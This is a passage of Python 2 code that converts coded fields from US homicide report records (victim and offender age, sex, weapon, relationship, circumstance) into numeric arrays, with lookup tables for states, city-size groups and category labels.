if sg == '0' or sg == '0 ' or sg == 0:
return 1
elif sg == '1' or sg == '1 ' or sg == 1:
return 2
elif sg == '11' or sg == '1A' or sg == 11:
return 3
elif sg == '12' or sg == '1B' or sg == 12:
return 4
elif sg == '13' or sg == '1C' or sg == 13:
return 5
elif sg == '20' or sg == 20 or sg == '2' or sg == '2 ' or sg == 2:
return 6
elif sg == '30' or sg == 30 or sg == '3' or sg == '3 ' or sg == 3:
return 7
elif sg == '40' or sg == 40 or sg == '4' or sg == '4 ' or sg == 4:
return 8
elif sg == '50' or sg == 50 or sg == '5' or sg == '5 ' or sg == 5:
return 9
elif sg == '60' or sg == 60 or sg == '6' or sg == '6 ' or sg == 6:
return 10
elif sg == '70' or sg == 70 or sg == '7' or sg == '7 ' or sg == 7:
return 11
elif sg == '80' or sg == 80 or sg == '8' or sg == '8 ' or sg == 8:
return 12
elif sg == '81' or sg == '8A' or sg == 81:
return 13
elif sg == '82' or sg == '8B' or sg == 82:
return 14
elif sg == '83' or sg == '8C' or sg == 83:
return 15
elif sg == '84' or sg == '8D' or sg == 84:
return 16
elif sg == '85' or sg == '8E' or sg == 85:
return 17
elif sg == '90' or sg == 90 or sg == '9' or sg == '9 ' or sg == 9:
return 18
elif sg == '91' or sg == '9A' or sg == 91:
return 19
elif sg == '92' or sg == '9B' or sg == 92:
return 20
elif sg == '93' or sg == '9C' or sg == 93:
return 21
elif sg == '94' or sg == '9D' or sg == 94:
return 22
elif sg == '95' or sg == '9E' or sg == 95:
return 23
else:
print 'group:', type(g), g, 'subgroup:', type(sg), sg
def typeConvert(t):
if t == '1' or t == 'A' or t == 1:
return 1
elif t == '2' or t == 'B' or t == 2:
return 2
else:
print 'type:', type(t), t
def sitConvert(s):
if s == '1' or s == 'A' or s == 1:
return 1
elif s == '2' or s == 'B' or s == 2:
return 2
elif s == '3' or s == 'C' or s == 3:
return 3
elif s == '4' or s == 'D' or s == 4:
return 4
elif s == '5' or s == 'E' or s == 5:
return 5
elif s == '6' or s == 'F' or s == 6:
return 6
else:
print 'situation:', type(s), s
def convSex(s):
if s == '1' or s == 'M' or s == 1:
return 1
elif s == '2' or s == 'F' or s == 2:
return 2
elif s == '9' or s == '8' or s is None or s == 'U' \
or s == 9 or s == 8:
return 3
else:
print 'sex:', type(s), s
def convRace(r):
if r == '1':
return 'W'
elif r == '2':
return 'B'
elif r == '3':
return 'I'
elif r == '4':
return 'A'
elif r == '9':
return 'U'
else:
print 'race:', type(r), r
def convWeap(w):
if w == '11' or w == 11:
return 1
elif w == '12' or w == 12:
return 2
elif w == '13' or w == 13:
return 3
elif w == '14' or w == 14:
return 4
elif w == '15' or w == 15:
return 5
elif w == '20' or w == 20:
return 6
elif w == '30' or w == 30:
return 7
elif w == '40' or w == 40:
return 8
elif w == '50' or w == 50:
return 9
elif w == '55' or w == 55:
return 10
elif w == '60' or w == 60:
return 11
elif w == '65' or w == 65:
return 12
elif w == '70' or w == 70:
return 13
elif w == '75' or w == 75:
return 14
elif w == '80' or w == 80:
return 15
elif w == '85' or w == 85:
return 16
elif w == '90' or w == '98' or w == '99' \
or w == 90 or w == 98 or w == 99 or w is None:
return 17
else:
print 'weapon:', type(w), w
def convRelation(r):
if r == '1' or r == 'HU' or r == 1:
return 1
elif r == '2' or r == 'WI' or r == 2:
return 2
elif r == '3' or r == 'CH' or r == 3:
return 3
elif r == '4' or r == 'CW' or r == 4:
return 4
elif r == '5' or r == 'MO' or r == 5:
return 5
elif r == '6' or r == 'FA' or r == 6:
return 6
elif r == '7' or r == 'SO' or r == 7:
return 7
elif r == '8' or r == 'DA' or r == 8:
return 8
elif r == '9' or r == 'BR' or r == 9:
return 9
elif r == '10' or r == 'SI' or r == 10:
return 10
elif r == '11' or r == 'IL' or r == 11:
return 11
elif r == '12' or r == 'SF' or r == 12:
return 12
elif r == '13' or r == 'SM' or r == 13:
return 13
elif r == '14' or r == 'SS' or r == 14:
return 14
elif r == '15' or r == 'SD' or r == 15:
return 15
elif r == '16' or r == 'OF' or r == 16:
return 16
elif r == '17' or r == 'NE' or r == 17:
return 17
elif r == '18' or r == 'AQ' or r == 18:
return 18
elif r == '19' or r == 'BF' or r == 19:
return 19
elif r == '20' or r == 'GF' or r == 20:
return 20
elif r == '21' or r == 'XH' or r == 21:
return 21
elif r == '22' or r == 'XW' or r == 22:
return 22
elif r == '23' or r == 'EE' or r == 23:
return 23
elif r == '24' or r == 'ER' or r == 24:
return 24
elif r == '25' or r == 'FR' or r == 25:
return 25
elif r == '26' or r == 'HO' or r == 26:
return 26
elif r == '27' or r == 'OK' or r == 27:
return 27
elif r == '28' or r == 'ST' or r == 28:
return 28
elif r == '99' or r == 'UN' or r == 99 or r == '98' or r == 98 \
or r == '88' or r == 88 or r is None:
return 29
else:
print 'relation:', type(r), r
def convCircum(c):
if c == '2' or c == 2:
return 2
elif c == '3' or c == 3:
return 3
elif c == '5' or c == 5:
return 5
elif c == '6' or c == 6:
return 6
elif c == '7' or c == 7:
return 7
elif c == '9' or c == 9:
return 9
elif c == '10' or c == 10:
return 10
elif c == '17' or c == 17:
return 17
elif c == '18' or c == 18:
return 18
elif c == '19' or c == 19:
return 19
elif c == '26' or c == 26:
return 26
elif c == '32' or c == 32:
return 32
elif c == '40' or c == 40:
return 40
elif c == '41' or c == 41:
return 41
elif c == '42' or c == 42:
return 42
elif c == '43' or c == 43:
return 43
elif c == '44' or c == 44:
return 44
elif c == '45' or c == 45:
return 45
elif c == '46' or c == 46:
return 46
elif c == '47' or c == 47:
return 47
elif c == '48' or c == 48:
return 48
elif c == '49' or c == 49:
return 49
elif c == '50' or c == 50:
return 50
elif c == '51' or c == 51:
return 51
elif c == '52' or c == 52:
return 52
elif c == '53' or c == 53:
return 53
elif c == '59' or c == 59:
return 59
elif c == '60' or c == 60:
return 60
elif c == '70' or c == 70:
return 70
elif c == '80' or c == 80:
return 80
elif c == '81' or c == 81:
return 81
elif c == '99' or c == 99 or c == 88 or c == '88' or c == '98' or c == 98 \
or c == '998' or c == 998:
return 99
elif c is None:
return 99
else:
print 'circumstance:', type(c), c
def convSubCircum(c):
if c == '1' or c == 'A' or c == 1:
return 1
elif c == '2' or c == 'B' or c == 2:
return 2
elif c == '3' or c == 'C' or c == 3:
return 3
elif c == '4' or c == 'D' or c == 4:
return 4
elif c == '5' or c == 'E' or c == 5:
return 5
elif c == '6' or c == 'F' or c == 6:
return 6
elif c == '0' or c == 'G' or c == '9' or c == '8' or c == '7' \
or c == 0 or c == 7 or c == 8 or c == 9 or c is None:
return 7
else:
print 'subcircumstance:', type(c), c
def convAge(a):
if a == 'BB' or a == 'NB' or a == '100' or a == '101':
return 0
elif a is None or a == '998':
return 999
else:
return int(a)
def convMSACode(c):
if c is None:
return 9999
else:
return int(c)
def convCount(c):
if c is None:
return 0
else:
return int(c)
header = {0 : 'year',
1 : 'month',
2 : 'state',
3 : 'group',
4 : 'population',
5 : 'MSA indication',
6 : 'MSA code',
7 : 'type of homicide',
8 : 'situation',
9 : 'victim count',
10 : 'offender count',
11 : 'victim 1 age',
12 : 'victim 1 sex',
13 : 'victim 2 age',
14 : 'victim 2 sex',
15 : 'victim 3 age',
16 : 'victim 3 sex',
17 : 'victim 4 age',
18 : 'victim 4 sex',
19 : 'victim 5 age',
20 : 'victim 5 sex',
21 : 'victim 6 age',
22 : 'victim 6 sex',
23 : 'victim 7 age',
24 : 'victim 7 sex',
25 : 'victim 8 age',
26 : 'victim 8 sex',
27 : 'victim 9 age',
28 : 'victim 9 sex',
29 : 'victim 10 age',
30 : 'victim 10 sex',
31 : 'victim 11 age',
32 : 'victim 11 sex',
33 : 'offender 1 age',
34 : 'offender 1 sex',
35 : 'offender 1 weapon',
36 : 'offender 1 relationship to victim 1',
37 : 'offender 1 circumstance',
38 : 'offender 1 sub-circumstance',
39 : 'offender 2 age',
40 : 'offender 2 sex',
41 : 'offender 2 weapon',
42 : 'offender 2 relationship to victim 1',
43 : 'offender 2 circumstance',
44 : 'offender 2 sub-circumstance',
45 : 'offender 3 age',
46 : 'offender 3 sex',
47 : 'offender 3 weapon',
48 : 'offender 3 relationship to victim 1',
49 : 'offender 3 circumstance',
50 : 'offender 3 sub-circumstance',
51 : 'offender 4 age',
52 : 'offender 4 sex',
53 : 'offender 4 weapon',
54 : 'offender 4 relationship to victim 1',
55 : 'offender 4 circumstance',
56 : 'offender 4 sub-circumstance',
57 : 'offender 5 age',
58 : 'offender 5 sex',
59 : 'offender 5 weapon',
60 : 'offender 5 relationship to victim 1',
61 : 'offender 5 circumstance',
62 : 'offender 5 sub-circumstance',
63 : 'offender 6 age',
64 : 'offender 6 sex',
65 : 'offender 6 weapon',
66 : 'offender 6 relationship to victim 1',
67 : 'offender 6 circumstance',
68 : 'offender 6 sub-circumstance',
69 : 'offender 7 age',
70 : 'offender 7 sex',
71 : 'offender 7 weapon',
72 : 'offender 7 relationship to victim 1',
73 : 'offender 7 circumstance',
74 : 'offender 7 sub-circumstance',
75 : 'offender 8 age',
76 : 'offender 8 sex',
77 : 'offender 8 weapon',
78 : 'offender 8 relationship to victim 1',
79 : 'offender 8 circumstance',
80 : 'offender 8 sub-circumstance',
81 : 'offender 9 age',
82 : 'offender 9 sex',
83 : 'offender 9 weapon',
84 : 'offender 9 relationship to victim 1',
85 : 'offender 9 circumstance',
86 : 'offender 9 sub-circumstance',
87 : 'offender 10 age',
88 : 'offender 10 sex',
89 : 'offender 10 weapon',
90 : 'offender 10 relationship to victim 1',
91 : 'offender 10 circumstance',
92 : 'offender 10 sub-circumstance',
93 : 'offender 11 age',
94 : 'offender 11 sex',
95 : 'offender 11 weapon',
96 : 'offender 11 relationship to victim 1',
97 : 'offender 11 circumstance',
98 : 'offender 11 sub-circumstance'}
group = {1 : "POSSESSIONS",
2 : "ALL CITIES 250,000 OR OVER",
3 : "ALL CITIES 1,000,000 OR OVER",
4 : "CITIES BETWEEN 500,000 AND 999,999",
5 : "CITIES BETWEEN 250,000 AND 499,999",
6 : "CITIES BETWEEN 100,000 AND 249,999",
7 : "CITIES BETWEEN 50,000 AND 99,999",
8 : "CITIES BETWEEN 25,000 AND 49,999",
9 : "CITIES BETWEEN 10,000 AND 24,999",
10 : "CITIES BETWEEN 2,500 AND 9,999",
11 : "CITIES UNDER 2,500",
12 : "NON-MSA COUNTIES",
13 : "NON-MSA COUNTIES 100,000 OR OVER",
14 : "NON-MSA COUNTIES BETWEEN 25,000 AND 99,999",
15 : "NON-MSA COUNTIES BETWEEN 10,000 AND 24,999",
16 : "NON-MSA COUNTIES UNDER 10,000",
17 : "NON-MSA STATE POLICE",
18 : "MSA COUNTIES",
19 : "MSA COUNTIES 100,000 OR OVER",
20 : "MSA COUNTIES BETWEEN 25,000 AND 99,999",
21 : "MSA COUNTIES BETWEEN 10,000 AND 24,999",
22 : "MSA COUNTIES UNDER 10,000",
23 : "MSA STATE POLICE"}
state = {1 : "ALABAMA",
2 : "ARIZONA",
3 : "ARKANSAS",
4 : "CALIFORNIA",
5 : "COLORADO",
6 : "CONNETICUT",
7 : "DELAWARE",
8 : "WASHINGTON, D.C.",
9 : "FLORIDA",
10 : "GEORGIA",
11 : "IDAHO",
12 : "ILLINOIS",
13 : "INDIANA",
14 : "IOWA",
15 : "KANSAS",
16 : "KENTUCKY",
17 : "LOUISIANA",
18 : "MAINE",
19 : "MARYLAND",
20 : "MASSACHUSETTS",
21 : "MICHIGAN",
22 : "MINNESOTA",
23 : "MISSISSIPPI",
24 : "MISSOURI",
25 : "MONTANA",
26 : "NEBRASKA",
27 : "NEVADA",
28 : "NEW HAMPSHIRE",
29 : "NEW JERSEY",
30 : "NEW MEXICO",
31 : "NEW YORK",
32 : "NORTH CAROLINA",
33 : "NORTH DAKOTA",
34 : "OHIO",
35 : "OKLAHOMA",
36 : "OREGON",
37 : "PENNSYLVANIA",
38 : "RHODE ISLAND",
39 : "SOUTH CAROLINA",
40 : "SOUTH DAKOTA",
41 : "TENNESSEE",
42 : "TEXAS",
43 : "UTAH",
44 : "VERMONT",
45 : "VIRGINIA",
46 : "WASHINGTON",
47 : "WEST VIRGINIA",
48 : "WISCONSIN",
49 : "WYOMING",
50 : "ALASKA",
51 : "HAWAII",
52 : "CANAL ZONE",
53 : "PUERTO RICO",
54 : "AMERICAN SAMOA",
55 : "GUAM",
62 : "VIRGIN ISLANDS"}
group = {1 : "POSSESSIONS",
2 : "ALL CITIES 250,000 OR OVER",
3 : "ALL CITIES 1,000,000 OR OVER",
4 : "CITIES BETWEEN 500,000 AND 999,999",
5 : "CITIES BETWEEN 250,000 AND 499,999",
6 : "CITIES BETWEEN 100,000 AND 249,999",
7 : "CITIES BETWEEN 50,000 AND 99,999",
8 : "CITIES BETWEEN 25,000 AND 49,999",
9 : "CITIES BETWEEN 10,000 AND 24,999",
10 : "CITIES BETWEEN 2,500 AND 9,999",
11 : "CITIES UNDER 2,500",
12 : "NON-MSA COUNTIES",
13 : "NON-MSA COUNTIES 100,000 OR OVER",
14 : "NON-MSA COUNTIES BETWEEN 25,000 AND 99,999",
15 : "NON-MSA COUNTIES BETWEEN 10,000 AND 24,999",
16 : "NON-MSA COUNTIES UNDER 10,000",
17 : "NON-MSA STATE POLICE",
18 : "MSA COUNTIES",
19 : "MSA COUNTIES 100,000 OR OVER",
20 : "MSA COUNTIES BETWEEN 25,000 AND 99,999",
21 : "MSA COUNTIES BETWEEN 10,000 AND 24,999",
22 : "MSA COUNTIES UNDER 10,000",
23 : "MSA STATE POLICE"}
suburban = {0 : "NON-SUBURBAN",
1 : "SUBURBAN"}
months = {1 : "JANUARY",
2 : "FEBRUARY",
3 : "MARCH",
4 : "APRIL",
5 : "MAY",
6 : "JUNE",
7 : "JULY",
8 : "AUGUST",
9 : "SEPTEMBER",
10 : "OCTOBER",
11 : "NOVEMBER",
12 : "DECEMBER",
99 : "UNKNOWN"}
ageUnder12mo = {1 : "BIRTH TO ONE WEEK OLD (INCLUDES \"ABANDONED INFANT\")",
2 : "ONE WEEK TO TWELVE MONTHS OLD",
9 : "INAP., NOT CODED 0 IN REF 23"}
homicide = {1 : "MURDER AND NONNEGLIGENT MANSLAUGHTER",
2 : "MANSLAUGHTER BY NEGLIGENCE"}
situation = {1 : "SINGLE VICTIM; SINGLE OFFENDER",
2 : "SINGLE VICTIM; UNKNOWN OFFENDER(S)",
3 : "SINGLE VICTIM; MULTIPLE OFFENDERS",
4 : "MULTIPLE VICTIMS; SINGLE OFFENDER",
5 : "MULTIPLE VICTIMS; MULTIPLE OFFENDERS",
6 : "MULTIPLE VICTIMS; UNKNOWN OFFENDER(S)"}
age = { 00 : 'UNKNOWN',
'BB' : "7 DAYS OLD TO 364 DAYS OLD",
'NB' : "BIRTH TO 6 DAYS OLD"}
sex = {1 : "MALE",
2 : "FEMALE",
3 : "UNKNOWN"}
weapon = {1 : "FIREARM, TYPE NOT STATED (DOES NOT INCLUDE MECHANIC'S GREASE GUN OR CAULKING GUN)",
2 : "HANDGUN - PISTOL, REVOLVER, ETC.",
3 : "RIFLE",
4 : "SHOTGUN",
5 : "OTHER GUN / UNKNOWN GUN",
6 : "KNIFE OR CUTTING INSTRUMENT - INCLUDES ICEPICK, SCREWDRIVER, AX, ETC.",
7 : "BLUNT OBJECT - HAMMER, CLUB, ETC. FACTS MUST SUGGEST WEAPON WAS NOT HANDS AND FEET.",
8 : "PERSONAL WEAPONS - INCLUDES BEATING BY HANDS, FEET, AND OTHER BODY MEMBERS OR USE OF TEETH",
9 : "POISON - DOES NOT INCLUDE GAS",
10 : "PUSHED OR THROWN OUT WINDOW",
11 : "EXPLOSIVES",
12 : "FIRE",
13 : "NARCOTICS AND DRUGS - INCLUDES SLEEPING PILLS",
14 : "DROWNING",
15 : "STRANGULATION - HANGING.",
16 : "ASPHYXIATION - INCLUDES ASPHYXIATION OR DEATH BY GAS",
17 : "OTHER- TYPE OF WEAPON NOT DESIGNED OR TYPE UNKNOWN"}
relationship = {1 : "HUSBAND",
2 : "WIFE",
3 : "COMMON-LAW HUSBAND",
4 : "COMMON-LAW WIFE",
5 : "MOTHER",
6 : "FATHER",
7 : "SON",
8 : "DAUGHTER",
9 : "BROTHER",
10 : "SISTER",
11 : "IN-LAW",
12 : "STEPFATHER",
13 : "STEPMOTHER",
14 : "STEPSON",
15 : "STEPDAUGHTER",
16 : "OTHER FAMILY",
17 : "NEIGHBOR",
18 : "ACQUAINTANCE",
19 : "BOYFRIEND",
20 : "GIRLFRIEND",
21 : "EX-HUSBAND",
22 : "EX-WIFE",
23 : "EMPLOYEE",
24 : "EMPLOYER",
25 : "FRIEND",
26 : "HOMOSEXUAL RELATIONSHIP",
27 : "OTHER - KNOWN TO VICTIM",
28 : "STRANGER",
29 : "UNKNOWN"}
circumstances = {2 : "RAPE",
3 : "ROBBERY",
5 : "BURGLARY",
6 : "LARCENY",
7 : "MOTOR VEHICLE THEFT",
9 : "ARSON",
10 : "PROSTITUTION AND COMMERCIALIZED VICE",
17 : "OTHER SEX OFFENSE",
18 : "NARCOTIC DRUG LAWS",
32 : "ABORTION",
19 : "GAMBLING",
26 : "OTHER - FELONY TYPE",
40 : "LOVER'S TRIANGLE",
41 : "CHILD KILLED BY BABYSITTER",
42 : "BRAWL DUE TO INFLUENCE OF ALCOHOL",
43 : "BRAWL DUE TO INFLUENCE OF NARCOTICS",
44 : "ARGUMENT OVER MONEY OR PROPERTY",
45 : "OTHER ARGUMENTS",
46 : "GANGLAND KILLINGS",
47 : "JUVENILE GANG KILLINGS",
48 : "INSTITUTIONAL KILLINGS",
49 : "SNIPER ATTACK",
50 : "VICTIM SHOT IN HUNTING ACCIDENT",
51 : "GUNCLEANING DEATH OTHER THAN SELF-INFLICTED",
52 : "CHILDREN PLAYING WITH GUN",
53 : "OTHER NEGLIGENT HANDLING OF GUN WHICH RESULTS IN DEATH",
59 : "ALL OTHER MANSLAUGHTER BY NEGLIGENCE",
60 : "OTHER NON-FELONY TYPE",
70 : "ALL SUSPECTED FELONY TYPE",
80 : "JUSTIFIABLE HOMICIDE - CIVILIAN",
81 : "JUSTIFIABLE HOMICIDE - POLICE",
99 : "ALL INSTANCES WHERE FACTS PROVIDED DO NOT PERMIT DETERMINATION"}
subCircum = {1 : "FELON ATTACKED POLICE OFFICER",
2 : "FELON ATTACKED FELLOW POLICE OFFICER",
3 : "FELON ATTACKED CIVILIAN",
4 : "FELON ATTEMPTED FLIGHT FROM CRIME",
5 : "FELON KILLED IN COMMISSION OF CRIME",
6 : "FELON RESISTED ARREST",
7 : "NOT ENOUGH INFORMATION TO DETERMINE"}
def gather_type_1(d,a,y):
for m in d:
n = []
n.append(y) # year
n.append(int(m[16])) # month
n.append(m[4]) # state
n.append(groupConvert(m[7],m[8])) # group
n.append(int(m[10])) # population
#n.append(m[5]) # agency code
#n.append(m[14]) # agency name
n.append(int(m[13])) # MSA indication
n.append(int(m[12])) # MSA code
n.append(typeConvert(m[19])) # type of homicide
n.append(sitConvert(m[21])) # situation
n.append(int(m[22]) + 1) # victim count
n.append(int(m[23]) + 1) # offender count
n.append(int(m[24])) # victim 1 age
n.append(convSex(m[34])) # victim 1 sex
n.append(int(m[25])) # victim 2 age
n.append(convSex(m[35])) # victim 2 sex
n.append(int(m[26])) # victim 3 age
n.append(convSex(m[36])) # victim 3 sex
n.append(int(m[27])) # victim 4 age
n.append(convSex(m[37])) # victim 4 sex
n.append(int(m[28])) # victim 5 age
n.append(convSex(m[38])) # victim 5 sex
n.append(int(m[29])) # victim 6 age
n.append(convSex(m[39])) # victim 6 sex
n.append(int(m[30])) # victim 7 age
n.append(convSex(m[40])) # victim 7 sex
n.append(int(m[31])) # victim 8 age
n.append(convSex(m[41])) # victim 8 sex
n.append(int(m[32])) # victim 9 age
n.append(convSex(m[42])) # victim 9 sex
n.append(int(m[33])) # victim 10 age
n.append(convSex(m[43])) # victim 10 sex
n.append(convAge(None)) # victim 11 age
n.append(convSex('9')) # victim 11 sex
n.append(int(m[64])) # offender 1 age
n.append(convSex(m[75])) # offender 1 sex
n.append(convWeap(m[108])) # offender 1 weapon
n.append(convRelation(m[119])) # offender 1 relationship to victim 1
n.append(convCircum(m[130])) # offender 1 circumstance
n.append(convSubCircum(m[141])) # offender 1 sub-circumstance
n.append(int(m[65])) # offender 2 age
n.append(convSex(m[76])) # offender 2 sex
n.append(convWeap(m[109])) # offender 2 weapon
n.append(convRelation(m[120])) # offender 2 relationship to victim 1
n.append(convCircum(m[131])) # offender 2 circumstance
n.append(convSubCircum(m[142])) # offender 2 sub-circumstance
n.append(int(m[66])) # offender 3 age
n.append(convSex(m[77])) # offender 3 sex
n.append(convWeap(m[110])) # offender 3 weapon
n.append(convRelation(m[121])) # offender 3 relationship to victim 1
n.append(convCircum(m[132])) # offender 3 circumstance
n.append(convSubCircum(m[143])) # offender 3 sub-circumstance
n.append(int(m[67])) # offender 4 age
n.append(convSex(m[78])) # offender 4 sex
n.append(convWeap(m[111])) # offender 4 weapon
n.append(convRelation(m[122])) # offender 4 relationship to victim 1
n.append(convCircum(m[133])) # offender 4 circumstance
n.append(convSubCircum(m[144])) # offender 4 sub-circumstance
n.append(int(m[68])) # offender 5 age
n.append(convSex(m[79])) # offender 5 sex
n.append(convWeap(m[112])) # offender 5 weapon
n.append(convRelation(m[123])) # offender 5 relationship to victim 1
n.append(convCircum(m[134])) # offender 5 circumstance
n.append(convSubCircum(m[145])) # offender 5 sub-circumstance
n.append(int(m[69])) # offender 6 age
n.append(convSex(m[80])) # offender 6 sex
n.append(convWeap(m[113])) # offender 6 weapon
n.append(convRelation(m[124])) # offender 6 relationship to victim 1
n.append(convCircum(m[135])) # offender 6 circumstance
n.append(convSubCircum(m[146])) # offender 6 sub-circumstance
n.append(int(m[70])) # offender 7 age
n.append(convSex(m[81])) # offender 7 sex
n.append(convWeap(m[114])) # offender 7 weapon
n.append(convRelation(m[125])) # offender 7 relationship to victim 1
n.append(convCircum(m[136])) # offender 7 circumstance
n.append(convSubCircum(m[147])) # offender 7 sub-circumstance
n.append(int(m[71])) # offender 8 age
n.append(convSex(m[82])) # offender 8 sex
n.append(convWeap(m[115])) # offender 8 weapon
n.append(convRelation(m[126])) # offender 8 relationship to victim 1
n.append(convCircum(m[137])) # offender 8 circumstance
n.append(convSubCircum(m[148])) # offender 8 sub-circumstance
n.append(int(m[72])) # offender 9 age
n.append(convSex(m[83])) # offender 9 sex
n.append(convWeap(m[116])) # offender 9 weapon
n.append(convRelation(m[127])) # offender 9 relationship to victim 1
n.append(convCircum(m[138])) # offender 9 circumstance
n.append(convSubCircum(m[149])) # offender 9 sub-circumstance
n.append(int(m[73])) # offender 10 age
n.append(convSex(m[84])) # offender 10 sex
n.append(convWeap(m[117])) # offender 10 weapon
n.append(convRelation(m[128])) # offender 10 relationship to victim 1
n.append(convCircum(m[139])) # offender 10 circumstance
n.append(convSubCircum(m[150])) # offender 10 sub-circumstance
n.append(int(m[74])) # offender 11 age
n.append(convSex(m[85])) # offender 11 sex
n.append(convWeap(m[118])) # offender 11 weapon
n.append(convRelation(m[129])) # offender 11 relationship to victim 1
n.append(convCircum(m[140])) # offender 11 circumstance
n.append(convSubCircum(m[151])) # offender 11 sub-circumstance
a.append(array(n))
def gather_type_2(d,a,y):
for m in d:
n = []
n.append(y) # year
n.append(int(m[16])) # month
n.append(m[5]) # state
n.append(groupConvert(None,m[7])) # group
n.append(int(m[10])) # population
#n.append(m[6]) # agency code
#n.append(m[14]) # agency name
n.append(int(m[13])) # MSA indication
n.append(int(m[12])) # MSA code
n.append(typeConvert(m[19])) # type of homicide
n.append(sitConvert(m[21])) # situation
n.append(int(m[22]) + 1) # victim count
n.append(int(m[23]) + 1) # offender count
n.append(int(m[24])) # victim 1 age
n.append(convSex(m[25])) # victim 1 sex
n.append(int(m[28])) # victim 2 age
n.append(convSex(m[29])) # victim 2 sex
n.append(int(m[32])) # victim 3 age
n.append(convSex(m[33])) # victim 3 sex
n.append(int(m[36])) # victim 4 age
n.append(convSex(m[37])) # victim 4 sex
n.append(int(m[40])) # victim 5 age
n.append(convSex(m[41])) # victim 5 sex
n.append(int(m[44])) # victim 6 age
n.append(convSex(m[45])) # victim 6 sex
n.append(int(m[48])) # victim 7 age
n.append(convSex(m[49])) # victim 7 sex
n.append(int(m[52])) # victim 8 age
n.append(convSex(m[53])) # victim 8 sex
n.append(int(m[56])) # victim 9 age
n.append(convSex(m[57])) # victim 9 sex
n.append(int(m[60])) # victim 10 age
n.append(convSex(m[61])) # victim 10 sex
n.append(convAge(None)) # victim 11 age
n.append(convSex('9')) # victim 11 sex
n.append(int(m[68])) # offender 1 age
n.append(convSex(m[69])) # offender 1 sex
n.append(convWeap(m[72])) # offender 1 weapon
n.append(convRelation(m[73])) # offender 1 relationship to victim 1
n.append(convCircum(m[74])) # offender 1 circumstance
n.append(convSubCircum(m[75])) # offender 1 sub-circumstance
n.append(int(m[76])) # offender 2 age
n.append(convSex(m[77])) # offender 2 sex
n.append(convWeap(m[80])) # offender 2 weapon
n.append(convRelation(m[81])) # offender 2 relationship to victim 1
n.append(convCircum(m[82])) # offender 2 circumstance
n.append(convSubCircum(m[83])) # offender 2 sub-circumstance
n.append(int(m[84])) # offender 3 age
n.append(convSex(m[85])) # offender 3 sex
n.append(convWeap(m[88])) # offender 3 weapon
n.append(convRelation(m[89])) # offender 3 relationship to victim 1
n.append(convCircum(m[90])) # offender 3 circumstance
n.append(convSubCircum(m[91])) # offender 3 sub-circumstance
n.append(int(m[92])) # offender 4 age
n.append(convSex(m[93])) # offender 4 sex
n.append(convWeap(m[96])) # offender 4 weapon
n.append(convRelation(m[97])) # offender 4 relationship to victim 1
n.append(convCircum(m[98])) # offender 4 circumstance
n.append(convSubCircum(m[99])) # offender 4 sub-circumstance
n.append(int(m[100])) # offender 5 age
n.append(convSex(m[101])) # offender 5 sex
n.append(convWeap(m[104])) # offender 5 weapon
n.append(convRelation(m[105])) # offender 5 relationship to victim 1
n.append(convCircum(m[106])) # offender 5 circumstance
n.append(convSubCircum(m[107])) # offender 5 sub-circumstance
n.append(int(m[108])) # offender 6 age
n.append(convSex(m[109])) # offender 6 sex
n.append(convWeap(m[112])) # offender 6 weapon
n.append(convRelation(m[113])) # offender 6 relationship to victim 1
n.append(convCircum(m[114])) # offender 6 circumstance
n.append(convSubCircum(m[115])) # offender 6 sub-circumstance
n.append(int(m[116])) # offender 7 age
n.append(convSex(m[117])) # offender 7 sex
n.append(convWeap(m[120])) # offender 7 weapon
n.append(convRelation(m[121])) # offender 7 relationship to victim 1
n.append(convCircum(m[122])) # offender 7 circumstance
n.append(convSubCircum(m[123])) # offender 7 sub-circumstance
n.append(int(m[124])) # offender 8 age
n.append(convSex(m[125])) # offender 8 sex
n.append(convWeap(m[128])) # offender 8 weapon
n.append(convRelation(m[129])) # offender 8 relationship to victim 1
n.append(convCircum(m[130])) # offender 8 circumstance
n.append(convSubCircum(m[131])) # offender 8 sub-circumstance
n.append(int(m[132])) # offender 9 age
n.append(convSex(m[133])) # offender 9 sex
n.append(convWeap(m[136])) # offender 9 weapon
n.append(convRelation(m[137])) # offender 9 relationship to victim 1
n.append(convCircum(m[138])) # offender 9 circumstance
n.append(convSubCircum(m[139])) # offender 9 sub-circumstance
n.append(int(m[140])) # offender 10 age
n.append(convSex(m[141])) # offender 10 sex
n.append(convWeap(m[144])) # offender 10 weapon
n.append(convRelation(m[145])) # offender 10 relationship to victim 1
n.append(convCircum(m[146])) # offender 10 circumstance
n.append(convSubCircum(m[147])) # offender 10 sub-circumstance
n.append(int(m[148])) # offender 11 age
n.append(convSex(m[149])) # offender 11 sex
n.append(convWeap(m[152])) # offender 11 weapon
n.append(convRelation(m[153])) # offender 11 relationship to victim 1
n.append(convCircum(m[154])) # offender 11 circumstance
n.append(convSubCircum(m[155])) # offender 11 sub-circumstance
a.append(array(n))
def gather_type_3(d,a,y):
for m in d:
n = []
n.append(y) # year
n.append(int(m[12])) # month
n.append(m[1]) # state
n.append(groupConvert(None,m[3])) # group
n.append(int(m[6])) # population
#n.append(m[2]) # agency code
#n.append(m[10]) # agency name
n.append(int(m[9])) # MSA indication
n.append(convMSACode(m[8])) # MSA code
n.append(typeConvert(m[15])) # type of homicide
n.append(sitConvert(m[17])) # situation
n.append(int(m[30]) + 1) # victim count
n.append(int(m[31]) + 1) # offender count
n.append(convAge(m[18])) # victim 1 age
n.append(convSex(m[19])) # victim 1 sex
n.append(convAge(m[32])) # victim 2 age
n.append(convSex(m[33])) # victim 2 sex
n.append(convAge(m[36])) # victim 3 age
n.append(convSex(m[37])) # victim 3 sex
n.append(convAge(m[40])) # victim 4 age
n.append(convSex(m[41])) # victim 4 sex
n.append(convAge(m[44])) # victim 5 age
n.append(convSex(m[45])) # victim 5 sex
n.append(convAge(m[48])) # victim 6 age
n.append(convSex(m[49])) # victim 6 sex
n.append(convAge(m[52])) # victim 7 age
n.append(convSex(m[53])) # victim 7 sex
n.append(convAge(m[56])) # victim 8 age
n.append(convSex(m[57])) # victim 8 sex
n.append(convAge(m[60])) # victim 9 age
n.append(convSex(m[61])) # victim 9 sex
n.append(convAge(m[64])) # victim 10 age
n.append(convSex(m[65])) # victim 10 sex
n.append(convAge(m[68])) # victim 11 age
n.append(convSex(m[69])) # victim 11 sex
n.append(convAge(m[22])) # offender 1 age
n.append(convSex(m[23])) # offender 1 sex
n.append(convWeap(m[26])) # offender 1 weapon
n.append(convRelation(m[27])) # offender 1 relationship to victim 1
n.append(convCircum(m[28])) # offender 1 circumstance
n.append(convSubCircum(m[29])) # offender 1 sub-circumstance
n.append(convAge(m[72])) # offender 2 age
n.append(convSex(m[73])) # offender 2 sex
n.append(convWeap(m[76])) # offender 2 weapon
